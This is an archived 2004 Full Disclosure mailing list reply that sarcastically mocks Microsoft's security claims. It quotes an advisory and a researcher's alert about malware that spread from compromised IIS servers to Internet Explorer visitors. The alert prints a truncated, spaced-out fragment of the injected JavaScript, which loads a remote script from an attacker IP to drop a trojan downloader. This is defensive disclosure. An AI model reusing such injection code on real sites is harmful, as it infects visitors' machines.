Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: New malware to infect IIS and from there jump to clients

From: <bills.bitch () hushmail com>
Date: Fri, 25 Jun 2004 08:01:33 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is impossible. Microsoft products are inherently secure. We have
a patched IIS as stated by the alert, an alpha security patch for the
operating system and open holes in the browser. No doubt this is a vicuous
anti-Microsoft attempt to discredit their security commitments by people
who are jealous of Bill Gates wealth. That or maybe by disgruntled individuals
who failed to earn their MVP status.


For the IIS side....

http://www.microsoft.com/security/incident/download_ject.mspx



Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.

Important  Customers who have deployed Windows XP Service Pack 2 RC2

are not

at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS

that

have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to

attempt

to infect users of Internet Explorer with malicious code.






-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of Peter

Kruse

Sent: Thursday, June 24, 2004 7:22 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] New malware to infect IIS and from there

jump to

clients

Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears

to be

fairly widespread already.

The malware spreads from infected IIS servers to clients that visit

the

webpage of the infected server. How the IIS servers was compromised

in the

first place is unfortunately still unknown (any info on that would

be

appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php.

It does

so by running a javascript that apparently gets appended to several

files in

the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:

<script language="Javascript">

    function InjectedDuringRedirection(){
     showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
:1\;").location= " java script:'<SCRIPT  SRC =\\' http://
217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in

the

following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
trojan-downloader and run it.

Consider to deny access to http://217.107.218.147 in your firewall.

This

will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.


-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A
n1iDB7VSzmP2NVQyeldO+9agWW8q
=Uc5R
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: